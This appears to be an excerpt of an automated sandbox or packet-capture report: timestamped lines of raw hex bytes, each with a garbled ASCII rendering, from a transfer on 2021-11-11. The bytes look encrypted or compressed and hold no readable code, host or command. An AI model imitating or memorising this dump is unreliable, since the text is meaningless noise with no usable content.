                                                                                                                                                                                2021-11-11 11:26:04 UTC1243INData Raw: 03 4a a2 5c b8 6f f1 6c 02 22 bb 88 55 49 63 fd e1 10 cb c8 65 3d e2 bf 1d 4a c2 6c 87 c6 dd d1 a0 16 a7 90 67 00 b0 ae fa 6f 47 6d 8b 3c 03 0e 2d d9 e9 c9 2e c3 f0 d8 27 76 43 07 1b 50 70 61 e3 c0 a6 15 ec a1 07 32 b4 88 8b f9 50 21 df 2d bb 04 e8 c9 7b 8f 76 ee dc 58 b9 00 05 e7 3d 9c c5 02 a8 32 00 97 75 10 d5 a0 88 71 e1 0b bb 07 21 e6 80 e7 33 99 60 4e 3b eb f4 80 cd a8 19 ff 52 c7 8c 00 0e e4 77 b8 82 d9 03 23 00 e8 3d a6 6a 76 bb eb 75 77 25 00 6b ef 93 09 4c 18 af 26 00 bf 51 97 07 19 db c5 b6 00 b1 4f d3 b9 e8 33 de c2 09 68 b0 69 fb 00 c1 22 be 34 53 38 09 24 00 85 76 da ea 3b b4 96 03 4c af 43 fc a2 80 e8 35 89 cc 24 13 e3 a3 06 62 6d 94 2e 00 4c 30 ce 57 cb 8a 31 a1 00 fd 21 1b 4f 1a dd 97 b9 0e fa 13 0e 39 60 be af 80 94 7c 00 c6 17 6b a8 ff
                                                                                                                                                                                Data Ascii: J\ol"UIce=JlgoGm<-.'vCPpa2P!-{vX=2uq!3`N;Rw#=jvuw%kL&QO3hi"4S8$v;LC5$bm.L0W1!O9`|k
                                                                                                                                                                                2021-11-11 11:26:04 UTC1259INData Raw: 45 92 78 23 2e 71 28 03 c0 26 d0 87 0f 41 a1 e7 19 f8 f6 e8 07 90 b0 a0 c8 c5 f3 38 9a c8 3d 2d 60 38 9f f5 00 26 b9 67 cc 79 f4 53 00 c7 64 38 b4 55 4b bf e4 00 db d8 48 2f 78 6f 9d cb 00 42 be 1d ea d9 53 63 ce 02 13 4c d6 b2 dd 33 e3 30 f8 c5 9b 1f 00 66 05 b9 f3 07 ae 0b ef bd 6e 30 00 2a 4c 33 61 f3 ac 98 9b 00 43 53 8e 0c 4b 64 ab dc 38 a0 68 00 ed 44 5d e7 6e c1 3b 00 73 9f 0c a3 4c 75 ba bc 00 9e c3 fe f3 48 f6 ab ef 00 30 6b a6 b0 0f 63 74 38 02 36 21 1c 0e 44 94 7f ce 58 1f ef a5 a9 80 54 d3 f7 a8 cc 8d 39 e4 e3 8e ce 89 99 01 9a eb df 1e f0 12 a5 00 e2 5b 6a fa c2 7d bd 16 06 8f 02 2d 21 a9 8c 00 9f cd 54 ae 6b 77 c7 50 70 7a 00 d6 e0 d1 16 a9 31 91 28 05 5d 9c 21 19 4d 80 e6 6f 17 ad 00 13 f6 3c 97 02 b4 57 a1 04 48 27 61 94 62 af 9c 18 2a 00
                                                                                                                                                                                Data Ascii: Ex#.q(&A8=-`8&gySd8UKH/xoBScL30fn0*L3aCSKd8hD]n;sLuH0kct86!DXT9[j}-!TkwPpz1(]!Mo<WH'ab*
                                                                                                                                                                                2021-11-11 11:26:04 UTC1275INData Raw: a3 42 70 33 3b 13 d5 00 92 8d 43 47 65 55 53 00 10 b8 f2 a1 4f 12 e8 36 78 fa 00 bd 7c 7d ea 84 8b a6 9f 00 66 ce 2a 2c 0b 7b d5 b4 e2 db 00 01 b5 86 5b cd 9c f4 f6 00 48 8a 4c 2a fa 29 85 4a 00 a7 84 01 f7 53 ce 74 5d 00 72 fc 10 d9 c5 ad 61 eb 03 6c 49 16 0c ca 32 80 31 79 04 fe 76 00 ef 4e c6 35 0b b4 41 2e 03 ee 7e 75 d0 27 6c d0 e6 f3 b0 7f d9 00 2c 8b c8 a0 40 84 87 66 0e 8d 3d 70 4a 9e 80 a7 be 05 cb 5d 10 fa d7 00 5a 2e b9 fc b8 d3 e6 a2 e2 7c 00 a3 c3 4d 36 db 20 e4 06 00 78 1a 88 8d ca 25 6c 61 01 f3 d5 83 ce 9d ed 99 c4 27 b1 00 63 c3 29 20 dd af 1d 10 00 83 b5 3f d7 e8 48 43 a0 7e 7d 78 3b 24 92 15 87 00 8f 0c 21 3c 50 ec 18 db 8d 4d 7c 67 a7 00 88 16 2a af 9f 32 15 b3 9f 60 90 b8 95 7e ae 00 77 b5 f3 71 a2 a9 a8 0c 05 a3 81 b6 79 08 80 90 6b
                                                                                                                                                                                Data Ascii: Bp3;CGeUSO6x|}f*,{[HL*)JSt]ralI21yvN5A.~u'l,@f=pJ]Z.|M6 x%la'c) ?HC~}x;$!<PM|g*2`~wqyk
                                                                                                                                                                                2021-11-11 11:26:04 UTC1291INData Raw: 60 fc 1f f2 50 00 17 b3 d7 58 c4 6f b7 e2 00 2f 95 f7 5b 71 7a 11 74 01 a7 e6 c3 ff 9c fc a3 f4 93 4e b0 74 00 96 72 02 d6 ce 42 67 a6 01 aa ca 6f 33 fc 8f ea 20 66 38 00 60 9b df e0 43 d1 21 31 0f 53 08 67 41 20 7f ee 99 36 c6 07 f8 e3 7b ae dd e0 89 b3 e4 79 00 14 2a 96 b6 18 e5 c8 40 00 9e 49 86 45 07 e8 1d 6d e0 99 03 cd 3b ed 82 0d 96 c8 b1 6c c1 71 f0 00 08 7a fd 22 24 14 cb 02 00 65 8d 7d 8a 8b 23 0e 9b 07 68 2b 78 3a 8c e0 34 69 08 06 ea 5f 07 49 17 8f 24 8b 17 5a e0 c7 1b 93 f1 0e 04 c2 ef f8 40 2f a6 53 1e e0 00 8b 80 32 01 2b 1d 46 ab e4 82 fe 34 1c f6 6f 56 b0 9e 0f 5e a4 03 6d 86 f9 48 9e 07 f5 01 e5 77 62 e3 d0 d4 53 0b 00 a0 72 11 a8 3e db 3f cf 00 01 45 aa 05 90 37 75 a7 00 91 bc 0f c6 a4 70 da 73 00 fa c5 d9 f6 08 33 1b 46 1f ef f1 8d 00
                                                                                                                                                                                Data Ascii: `PXo/[qztNtrBgo3 f8`C!1SgA 6{y*@IEm;lqz"$e}#h+x:4i_I$Z@/S2+F4oV^mHwbSr>?E7ups3F
                                                                                                                                                                                2021-11-11 11:26:04 UTC1307INData Raw: 2d 6b 43 01 93 c1 fe 7f f0 cd f9 05 94 df 54 f7 d5 c7 f0 07 29 07 80 32 ea 5d f1 07 27 e1 e9 b9 7c 60 97 91 29 56 53 c4 50 b8 34 c2 48 8a f8 f6 8b 5b f1 97 27 45 02 69 fe 6a c9 44 29 a0 11 8c c3 0f f7 7a c1 ea a0 81 f2 4e cb af 7f 37 9c 5b 3f b0 d3 0b 5a 81 ea 09 85 48 ff cf 58 d9 b5 ba 37 f1 68 45 58 f8 9b f4 ef 2d 31 96 13 08 a7 d9 88 33 1b 31 06 45 0c 6f 3a 2d 29 3c 6c a3 54 ef 49 e4 bb bd 95 c0 9a 57 df 5d be ae 9f cc 6e 12 e9 f9 1f 18 1c 24 57 ba 1f 4f 70 35 f8 1f 11 90 ed 40 74 b3 dd b7 ac 9e 1c bc 4c 6e 2f 12 37 a1 00 fe e3 8c 49 c9 a6 04 69 9f fb 9c 6d ae 20 27 f1 1a 97 d3 0d 21 50 64 d2 6f 40 cb 6a 53 3f b9 d6 48 38 de 59 4a 45 18 8b 76 aa ba 90 74 9d 39 05 c7 b8 2d e0 de 85 58 fd bd 92 f3 03 62 30 81 0c e5 6e 04 ee 02 e0 56 f7 2f 61 10 9f ac 4a
                                                                                                                                                                                Data Ascii: -kCT)2]'|`)VSP4H['EijD)zN7[?ZHX7hEX-131Eo:-)<lTIW]n$WOp5@tLn/7Iim '!Pdo@jS?H8YJEvt9-Xb0nV/aJ
                                                                                                                                                                                2021-11-11 11:26:04 UTC1323INData Raw: c7 da 1a 57 67 46 69 e5 db 92 14 ea ce bc 4e f8 63 85 d6 5a be 5a a6 c8 42 bc c0 dc 24 7c 2f 4d ed 48 f9 87 af 4a 09 e2 16 84 91 82 ba a2 09 60 14 0e 7c be 56 00 72 c9 4e 6c b7 ef ec 2b 16 d1 0b de 0b c1 73 78 d9 00 1d 65 8a cd e9 7c 5e 8e f2 71 24 90 e6 5a c0 68 cd 4c cb 6b 38 d3 dd bc 6f b7 f1 00 cc 2f 55 b5 15 1c a5 52 07 1e a2 89 2a 24 38 da 5d 73 2d 13 b3 c9 ce af 4c 34 55 04 68 c7 15 4c 69 99 b3 2b bc f6 bd 21 c4 7a 8c 3e eb 13 09 54 0c 2c 2e 50 95 b4 5b 27 e9 4e 20 63 53 68 1b 71 25 ba 4f 76 86 6b f2 c1 bd 15 78 20 3d 95 53 29 e9 e2 d5 5c 5b 56 96 82 58 e9 46 dd b5 47 21 7f f1 70 12 2d da d9 24 48 87 4e 41 2c e1 df fa 00 f7 2e d4 7d fc 40 17 52 0b 23 ea 08 46 be 85 9b 8c dd b9 e6 3b 71 ca 14 d6 39 3e de 7e f5 38 18 cf 5f 10 80 c7 6f fc ff fa 4b ad
                                                                                                                                                                                Data Ascii: WgFiNcZZB$|/MHJ`|VrNl+sxe|^q$ZhLk8o/UR*$8]s-L4UhLi+!z>T,.P['N cShq%Ovkx =S)\[VXFG!p-$HNA,.}@R#F;q9>~8_oK
                                                                                                                                                                                2021-11-11 11:26:04 UTC1339INData Raw: 1d 83 36 86 c5 ed 79 ed a0 54 57 a8 b0 73 67 2e 34 1a 88 89 f9 8b 5d 46 aa 30 aa 68 40 0c e0 01 61 4f 18 99 df 8b 4c ee 48 00 f3 11 1c 61 a4 51 dd da 0c d3 59 ee 02 79 e2 0b 18 0e 07 0f 2e 3c 89 3c a9 f2 c0 e4 cb 03 99 62 08 0d 41 0d fe ab 60 f0 b4 18 01 b2 68 c0 f2 89 4a 27 9c 58 28 40 fe 3e 99 58 98 2e c0 14 1a 69 36 84 7e 3a e6 1c 98 2d 9b 18 bd a1 c6 54 4f 86 78 25 b8 59 ae 10 bf b7 84 86 44 80 26 a9 98 75 07 5a ac 15 00 26 1c 76 be c3 0c e8 d0 8c 81 6d 35 82 c8 10 89 bb 41 80 f4 dc 4d 16 1e 0c 2b 22 9c 91 20 3e 3a 2d 9f b0 08 dd 94 90 81 52 21 c8 03 bf 2c a2 67 0a 90 ff 0f 7c 0e e1 89 53 f9 6d 34 b2 20 ea c7 03 31 0c 4a 38 6e e7 39 d0 22 cd 1a 4e 03 58 44 7d 29 12 c1 96 c2 24 bc eb a0 c0 7c 25 75 2e 92 8e da 31 26 dd b3 22 02 ac 51 63 3f c4 a6 98 6e
                                                                                                                                                                                Data Ascii: 6yTWsg.4]F0h@aOLHaQYy.<<bA`hJ'X(@>X.i6~:-TOx%YD&uZ&vm5AM+" >:-R!,g|Sm4 1J8n9"NXD})$|%u.1&"Qc?n
                                                                                                                                                                                2021-11-11 11:26:04 UTC1355INData Raw: 8a f2 49 df d0 04 95 d1 78 40 68 c5 b8 6e 9e ab 25 f5 b6 8c f5 7a e3 49 a3 e9 f6 19 05 68 59 01 8b 1f 84 ec bf e2 7f 5f 8a 42 02 29 d6 5a e9 bb 80 1e 69 7c ff 45 bf 95 de a7 77 67 5a e9 1d c3 27 db 8d 4b d7 67 59 af 56 a0 40 68 a1 63 bd 5b 7e de 02 4b 41 c4 9c 89 bb 06 7b f3 8d b4 cf f1 4e ed 89 a4 2d be 7b e3 f8 09 19 6a 02 76 b8 53 0b 10 63 98 5b 18 16 b4 d8 4a 01 e8 4d a5 e3 99 09 6c 2b 01 75 c6 e6 96 a2 ee d7 c9 ad 46 92 18 31 c3 13 14 f8 b4 80 9a fa bf 92 3c e3 2a 12 da 74 01 30 ae 34 51 8b c6 5d 1c af 30 0c ab c7 98 a0 60 cc 01 f1 ad 0a f0 d8 45 4c 79 a9 1b 8e 7a 48 d8 54 cb 4e c0 98 b3 6e b2 44 e0 18 67 62 6f 54 5b d7 80 04 96 39 a4 aa 32 a2 40 fc 78 10 03 1d 34 01 1e 62 e9 2f 18 7e 40 8c 8b 10 12 ee 1b 09 c1 10 a2 4c 80 18 07 8a 96 f3 7a 42 33 94
                                                                                                                                                                                Data Ascii: Ix@hn%zIhY_B)Zi|EwgZ'KgYV@hc[~KA{N-{jvSc[JMl+uF1<*t04Q]0`ELyzHTNnDgboT[92@x4b/~@LzB3
                                                                                                                                                                                2021-11-11 11:26:04 UTC1371INData Raw: 7d 25 44 3f 77 e0 72 97 ef 25 c3 0b a0 9c 24 89 bc 18 a0 82 94 bd 27 ec 42 55 6d cc 4a 3f 05 7d 7c fe 3b 1e 5c 00 0a 70 f3 90 7e 13 62 41 0c e5 aa 3a 79 78 a6 ce 64 1f c1 9d be 52 67 40 20 42 c0 38 cc 59 2a b4 22 1e f8 aa 35 40 ab c1 ba 71 e9 ff 02 32 09 80 97 48 54 5f 7c 16 52 5f ea 57 5f 76 16 45 f7 e0 8e ea 00 db 09 d2 fd ee f1 ff 93 e1 80 18 d7 e8 e9 c3 38 bc c1 fc 0b 56 fd b0 69 26 18 d2 aa 18 a4 5a 28 71 ec f8 00 6d 60 26 8d 73 57 78 1c 91 b8 1c 95 40 de ff 23 ee 7e 97 90 0c 00 04 ba e9 aa 42 2d f3 5f 95 c8 32 c6 d9 c5 09 a9 df c1 01 08 c8 24 fe d5 48 f7 5c 8b 53 58 2c fc 1c 00 ba b8 39 13 78 8c 4e 9b f0 20 e8 fe 1e e4 92 a9 69 84 08 7d 7e 00 f0 c7 b5 c3 f3 95 31 e1 e2 c8 66 c8 d8 14 28 12 63 f1 17 ad 5c 02 a5 0f f8 ff 97 22 b8 c0 5f 30 0c 12 43 b5
                                                                                                                                                                                Data Ascii: }%D?wr%$'BUmJ?}|;\p~bA:yxdRg@ B8Y*"5@q2HT_|R_W_vE8Vi&Z(qm`&sWx@#~B-_2$H\SX,9xN i}~1f(c\"_0C
                                                                                                                                                                                2021-11-11 11:26:04 UTC1387INData Raw: 7b d9 e7 8c 30 a9 9f 18 cc 04 08 fb e0 9e 85 06 a3 2a 68 00 0d 73 42 76 21 a1 b0 ec 13 fc 8b cb f0 6d 28 63 78 f4 eb 3c 05 08 22 c4 fc 37 fb 33 d5 4e 82 5b 20 ad 51 21 8e a4 e4 5a 60 a1 ed 3b fa 64 21 06 9c d7 02 28 4a 47 f2 cb 10 d6 9d 26 5b 7c 64 0c fe e3 76 08 48 12 27 a7 48 fa 91 8e cc 40 66 19 96 9d 80 78 46 9a b7 c5 c1 0c 31 97 2c 50 2f a3 62 78 ee c6 4c 17 2e 86 c8 8f d0 00 18 35 1c 2a 6e c4 74 ef 30 d2 be 80 f2 94 a4 00 44 ad 21 ed 1d 51 c2 7a 63 98 4c 49 69 18 48 9e 3a c0 da bb 4c e9 04 4a a3 2f 0e 0b 99 5e 33 bf a3 f9 b0 55 bd f2 13 fe 9f 6f bb f3 66 d2 a0 7a 14 95 77 b5 84 1c e9 25 6e 19 bd 74 72 7c 9c 88 4b f7 47 5f eb de 0b eb 77 96 1e 9e 8c 66 e9 32 d2 02 ee 8e 5f 5a df d1 5e eb 6d a6 6e ec 9e a0 68 76 44 25 7c 65 7f 9f 97 13 fd 56 dc 0d 89
                                                                                                                                                                                Data Ascii: {0*hsBv!m(cx<"73N[ Q!Z`;d!(JG&[|dvH'H@fxF1,P/bxL.5*nt0D!QzcLIiH:LJ/^3Uofzw%ntr|KG_wf2_Z^mnhvD%|eV
                                                                                                                                                                                2021-11-11 11:26:04 UTC1403INData Raw: 0a fd fc 4f b7 cb 28 41 42 57 05 1c 46 d0 ca c6 80 fe a8 0c 9c b3 a1 9c fd 2a 00 c2 c8 54 bc 1e 4a 1f 58 99 02 a5 c4 b8 04 12 c4 ab 5f c0 af 84 2b b8 52 cb 5c e0 1a 1b be 7d 55 c2 30 70 db 8b 98 e8 ea c5 13 8f 99 07 0b b6 fc 80 d5 23 fe 7b bf 0c 2e 9c 1d 7e 2c 32 65 bb 9c 87 f8 66 06 e4 c0 84 e0 0c 4e 2b b8 da 86 29 a2 9c 31 44 64 7c 1d bd 8c 8c 67 86 70 25 18 4f a8 cc 38 3b 38 c6 ac 71 7b 08 02 37 98 f9 e0 2d ea 44 ae 12 68 59 43 fb cc 62 23 f5 89 5c fc dd 5d fb 1e 00 5e c7 12 79 16 3c 01 82 cc 70 ea 4e 78 27 2b fe 72 4f b0 78 f6 ed 89 61 57 80 a9 76 ff 14 1f 81 1a 3f af 24 34 f0 bd 46 f7 09 6f f3 6a 10 93 80 a0 4f 5a fc c4 30 f5 87 03 68 2a 01 33 3d 60 30 fc 18 0c 2f 8b 60 f8 c2 24 7b 6c b8 40 93 80 78 35 a4 f6 76 91 28 38 0a ea ed 24 c2 d0 ef 8a 64 39
                                                                                                                                                                                Data Ascii: O(ABWF*TJX_+R\}U0p#{.~,2efN+)1Dd|gp%O8;8q{7-DhYCb#\]^y<pNx'+rOxaWv?$4FojOZ0h*3=`0/`${l@x5v(8$d9
                                                                                                                                                                                2021-11-11 11:26:04 UTC1419INData Raw: 37 13 ac 0d 20 3f d9 28 21 63 5e 18 91 55 01 78 94 cd d2 44 1e 98 20 cc c2 40 33 56 3e 45 01 93 ff 76 20 93 b7 cc 03 e0 0f 2d ae 2e 10 50 bb da 04 fe 78 ed 24 fb c0 ab cb 27 8a c0 34 3b c4 67 bd e3 02 29 eb 81 fb 7b 77 57 e4 67 20 15 f1 03 5f c6 8e db 88 64 18 bc 92 43 a0 d8 4c 12 ed d9 8c b0 98 17 54 6c bb 76 0c 69 2c 62 a0 30 40 49 3e df 07 58 20 30 80 cc d0 49 9e 09 00 22 44 fe 1b 1e f3 07 6c 90 b4 b7 d7 80 41 27 21 52 29 7d 3b 94 0f 9e 50 76 ae dd 85 20 60 e6 fb 80 98 68 3d 12 46 e1 de 05 99 c5 7c 28 3c c0 71 1f e8 e7 c9 24 9f c8 3f f1 0d 5f 80 ec 9e 06 64 b3 9c 0a 1d ee cc 90 13 0d e5 9e ca 72 24 82 04 9f 6b 82 95 81 14 c9 c1 f7 20 14 a7 16 b5 7c a3 b8 91 84 71 d1 ed 70 19 2e 61 b8 74 6c c8 18 7f 6d 1c d0 81 c0 2c ec 4f 39 80 67 3d 01 ce ee a1 01 35
                                                                                                                                                                                Data Ascii: 7 ?(!c^UxD @3V>Ev -.Px$'4;g){wWg _dCLTlvi,b0@I>X 0I"DlA'!R)};Pv `h=F|(<q$?_dr$k |qp.atlm,O9g=5
                                                                                                                                                                                2021-11-11 11:26:04 UTC1435INData Raw: e7 ec 68 0b 89 d2 0d 7c dc da f8 68 6d 7d c2 6b 6f 69 f5 67 5c 4a 72 ab ef eb 73 51 91 53 40 b8 7d 12 89 87 4d 52 62 ac b2 e4 aa a7 6c 28 4e 5d 09 a2 b6 17 29 57 bc 4d 97 7e 2c 7a 7d be 25 97 5f 97 09 27 10 66 d0 fe 89 a2 3b 05 09 65 1f 98 4a 41 22 de 43 20 5f 76 24 1b ee 76 43 10 e1 14 1c 24 df 1c 82 12 28 5b 24 67 b0 48 10 48 68 9c 84 cf 21 a8 16 c5 36 ac 88 14 38 b2 74 0a ba 50 31 51 2a 13 5f b2 c1 00 1b df 7b 55 53 e2 e4 00 e6 45 9e 6e f3 0b 0c 5c 01 51 d6 dc c9 cf dd 52 21 b8 31 f0 8f 18 da e7 04 c5 e5 49 ef 0f a6 c7 2c d0 6c 6d 20 01 6a df 62 7c ea e7 16 c2 f5 71 4f 80 c1 cb 33 63 42 72 5e 68 c0 86 a2 7d 7b 3e c8 28 01 2d e6 44 6a 27 18 41 1e bf 76 9f dc da b1 30 ef 34 f1 79 9e 1c 13 b7 d8 bb e0 d6 83 ab 00 14 63 d2 60 9e b1 6f 99 01 3a 80 71 bb ef
                                                                                                                                                                                Data Ascii: h|hm}koig\JrsQS@}MRbl(N])WM~,z}%_'f;eJA"C _v$vC$([$gHHh!68tP1Q*_{USEn\QR!1I,lm jb|qO3cBr^h}{>(-Dj'Av04yc`o:q
                                                                                                                                                                                2021-11-11 11:26:04 UTC1451INData Raw: a4 93 61 51 66 28 01 ab 70 13 f8 d4 79 dd 80 54 f6 c5 8c 5c 7a 35 09 d9 d7 da 69 5d 64 44 fb 7c 39 16 5f c6 04 f0 2e 7c eb 9c da d2 04 a3 e5 6e 88 78 26 fc 09 3b bc dd 5c d2 27 08 f3 ca 84 b6 40 ba 4c 96 49 bf d9 7c 86 16 5c fd 45 9e 1c 18 d8 10 bc 3e 00 31 8f b4 99 49 7f 6f 54 2e 8a 46 4b 01 f0 87 37 f7 fe 3e b2 12 86 39 a9 40 13 a6 ac 97 ba 65 0c ea f6 28 08 e7 d1 5b 9f c9 8a 0b b2 2a 05 25 d2 43 30 b2 5b db 82 78 30 61 9d 24 b1 0c 45 8c 1e 7e cd 72 08 01 9b 59 3e 0e db 04 0a 38 62 0b f8 fc 40 d4 46 1e 36 40 06 0b 55 66 60 9a 09 29 4d dc bb d4 53 9e 67 b0 b0 b4 d3 e5 24 62 58 6f 8c 27 74 8c 82 58 6a 35 09 1a cf e9 80 c9 df 88 53 86 13 17 c6 94 bb 49 28 7e 60 0a 54 e5 80 69 5a 4a 98 87 68 c4 0b 81 68 04 36 64 f4 6c 97 51 f0 84 cd 47 ea bf d9 74 2b f7 f0
                                                                                                                                                                                Data Ascii: aQf(pyT\z5i]dD|9_.|nx&;\'@LI|\E>1IoT.FK7>9@e([*%C0[x0a$E~rY>8b@F6@Uf`)MSg$bXo'tXj5SI(~`TiZJhh6dlQGt+
                                                                                                                                                                                2021-11-11 11:26:04 UTC1459INData Raw: 4a 58 c8 64 31 85 2d 2d 4f e6 dc 2c 83 db b2 43 30 a5 05 1c de 52 07 1b 05 4c 26 d6 bd f8 c4 22 0d ae 49 65 fa 78 08 31 e7 d5 34 b3 5d 2d 70 16 21 a4 af 88 29 91 25 f2 f5 7f c6 72 30 10 3b b4 ee f8 bc 09 ba 4f 8e 4b 4c 98 f4 d4 84 62 55 d1 b7 29 64 00 4a cf 01 98 57 f0 3b 3d f8 77 dd 06 7e ac 8a 34 c9 9b c4 2a d9 e4 be f8 21 87 48 1a ab d8 8d 17 5c b8 81 e0 c7 b3 cb 5c 1e 76 eb 1c 19 f1 80 6d bd 8c dc 7d ae b4 c6 04 1b 35 64 c9 82 bd be 08 bf 4f 27 82 b1 ac 3c 39 64 66 0c 78 f3 30 f8 8e 86 01 c5 27 ac 93 2e e7 0d 2e cd fb 96 04 b3 ac d6 4b fe c9 90 08 8a 04 50 97 14 f6 4c a6 86 98 94 17 5c 4a 4a ba cc cf 5f 69 40 1d 70 f0 33 c7 85 24 a3 da d3 7f 7a f7 2f 39 01 7d 10 c5 a5 29 27 b0 ab 57 85 17 da ec a6 3b 16 80 b4 0b ec 7c c1 6f f3 18 b9 cf 7f 34 0f 4d c6
                                                                                                                                                                                Data Ascii: JXd1--O,C0RL&"Iex14]-p!)%r0;OKLbU)dJW;=w~4*!H\\vm}5dO'<9dfx0'..KPL\JJ_i@p3$z/9})'W;|o4M
                                                                                                                                                                                2021-11-11 11:26:04 UTC1475INData Raw: 60 f4 00 a1 a4 67 51 aa ca d4 01 e8 35 25 63 bc 68 c4 80 40 e2 0f 52 3b bf 67 29 1c af e6 09 68 60 10 16 f6 22 cb b0 fe c0 0e 28 18 a4 96 2d db a5 f7 b0 8a 24 c6 e1 6c f6 a6 28 21 85 6d 0c 90 8f 50 2f 2e 7d cd cc 80 be 96 58 93 ac 61 28 c0 1b 48 17 d3 5d 97 bb 60 aa 30 53 c4 5c ea 65 89 69 fd 49 15 c1 a5 4e d0 d3 00 86 b8 d8 ff 0c 2f 7b b7 03 68 27 ae de e6 16 12 54 10 fe b3 38 18 5e b4 18 66 9b 80 81 e4 0a ac 9c 69 49 48 1f 6a a0 e5 0c bd 08 54 ae 5a 02 94 0a 94 58 54 c4 11 66 00 27 43 ee 1f d6 40 6f 2e 40 08 0d 00 4a 34 16 42 23 d4 4d 5f 12 0e 44 06 90 26 08 0a 0f 2f 17 a0 12 f1 5f 59 1f 40 c9 71 bf 2e dd 26 52 e5 ff 80 3b 8d 98 17 13 28 3d 0d b4 9c 63 48 3e 6a 30 df 31 44 8a be 64 59 0c 9c ac 66 18 c5 3e 2c c9 c2 e9 50 38 f9 58 31 13 1a 0e ff f4 68 dc
                                                                                                                                                                                Data Ascii: `gQ5%ch@R;g)h`"(-$l(!mP/.}Xa(H]`0S\eiIN/{h'T8^fiIHjTZXTf'C@o.@J4B#M_D&/_Y@q.&R;(=cH>j01DdYf>,P8X1h
                                                                                                                                                                                2021-11-11 11:26:04 UTC1491INData Raw: 1f e4 e3 b7 46 c6 ed ee 30 13 dc 6f 01 88 f6 07 ee 84 4e a1 cd 7c 2a a3 43 18 de 27 1c f5 4d 05 5c 26 30 a7 6a b8 16 04 3c cb 2b ac a4 66 d0 4d 74 aa 4f ff 5e e0 2d 01 64 50 d2 03 2f 06 bf 7d af a4 33 bd 49 38 52 a6 2c 78 6e 31 86 07 5c e3 cd 62 d8 16 57 62 ae 31 3c 26 83 7e ec 7b 18 98 94 80 cc 3a c0 7c 28 e8 84 3d e2 9c f4 4f ac 9a 68 4d 40 5a b6 4b b7 45 9a 6d ca 06 a0 78 c8 94 1e 92 40 cf a6 e6 26 78 42 d0 43 00 9f 44 c5 e3 c0 44 1a 27 ee b2 a3 17 77 cd 3b bc 70 c5 dd c4 fe 9d d4 48 aa f8 5b d8 46 b0 60 b0 1c 30 46 ee 30 b7 9d a8 9f 03 42 fb dd 3c 68 1c dd 4c 20 a1 11 c6 e8 01 2f f1 6c f1 4f 2e c1 9d 72 82 31 fd 08 98 9b 27 fc 5a 83 1e 94 14 2a 8c 24 98 3c d3 e7 09 35 04 a3 c9 8c 6e fb 17 98 10 1d d4 2e 09 0e 4b f6 33 08 8e e3 00 60 24 87 d8 e8 ba 00
                                                                                                                                                                                Data Ascii: F0oN|*C'M\&0j<+fMtO^-dP/}3I8R,xn1\bWb1<&~{:|(=OhM@ZKEmx@&xBCDD'w;pH[F`0F0B<hL /lO.r1'Z*$<5n.K3`$
                                                                                                                                                                                2021-11-11 11:26:04 UTC1507INData Raw: 5f d1 98 e0 a9 b1 c9 41 5b 38 c0 7c 09 a0 74 01 0b f0 cd 1f d7 12 be 3a fd 6c 92 92 c4 44 70 b4 27 68 6b 9a 06 7c 5c b5 2c 05 4a e5 7c c8 68 6f 40 be a2 61 6c b4 8e 4c a0 63 a6 5b f8 ec 4b 25 14 bf a6 60 08 a9 50 4e bf 04 52 fa 30 02 45 eb 51 01 0e 28 0f b8 50 6b 23 6d 03 ca 3a 43 54 79 23 12 e9 7a 1c 1d 46 47 fd 49 11 00 2f fa d2 74 4b 8b aa 0c 14 ed 32 fd f8 46 02 3c 5f 7e 55 94 2b df 8f 04 38 21 75 7d 00 c2 0b fd 9d 58 4b 39 82 4a 35 00 bc 3c ee de ff 18 01 fb eb 48 d9 dc 27 55 48 6c 46 42 ac 2c c2 8a 8a df 55 b6 42 d4 e2 56 70 88 10 c7 00 9f 6d 23 b4 ee 61 31 e3 1c 28 d2 f7 45 7a fb e6 20 01 d3 66 cb da 16 24 74 2c 45 c1 2c 25 c5 ee 1b ec 69 de 40 82 b7 2a 5d 4a f6 59 a9 de 25 6b c0 e8 78 60 c6 ac 7f 14 20 00 62 bf 37 cc b9 47 6d 40 27 7a 04 21 f0 73
                                                                                                                                                                                Data Ascii: _A[8|t:lDp'hk|\,J|ho@alLc[K%`PNR0EQ(Pk#m:CTy#zFGI/tK2F<_~U+8!u}XK9J5<H'UHlFB,UBVpm#a1(Ez f$t,E,%i@*]JY%kx` b7Gm@'z!s
                                                                                                                                                                                2021-11-11 11:26:04 UTC1523INData Raw: 55 17 69 02 11 d5 bc 5e 7f f9 4f 58 95 ff 89 d1 6b f0 52 6d 59 b7 41 03 6a a2 c1 44 c6 ad fa 09 ba 9a c0 4e f6 f8 16 e5 d3 aa be 09 82 f1 f0 95 02 0a e7 ce 1f 2b a1 74 82 2d 00 ba c0 ff d0 79 03 cf a3 1c 27 9c 11 92 eb 00 d1 dc 39 01 39 fa b5 cb 88 76 a9 39 c5 c2 0a bd 78 5e db 05 85 7b 82 c8 dc f5 65 b0 28 08 be c2 d6 fd fd 10 c0 8b de 80 fa 7b 80 cc eb e9 dc 3d 18 fd c0 19 e1 90 be 5a 87 81 dd 44 fc fe f0 c6 5b 3a c0 6d 92 8e f7 09 15 ea 5c f3 e1 86 81 64 58 99 19 65 8a 7c 4c 39 80 06 93 53 18 8f c6 09 92 82 e8 89 c9 8c f3 79 32 33 10 10 8e 08 30 da af c8 78 ba 3e 00 8c e4 88 d1 8f 53 c7 68 b5 83 3d 50 ca 14 70 10 48 b4 0f 15 3d c6 e6 c1 e2 20 5f a2 c1 c3 94 14 34 fa 57 0d de bb 05 d3 b0 d7 13 16 66 9a fc e9 b1 cf 6d c1 80 10 59 30 1d 21 a1 01 8b e0 dd
                                                                                                                                                                                Data Ascii: Ui^OXkRmYAjDN+t-y'99v9x^{e({=ZD[:m\dXe|L9Sy230x>Sh=PpH= _4WfmY0!
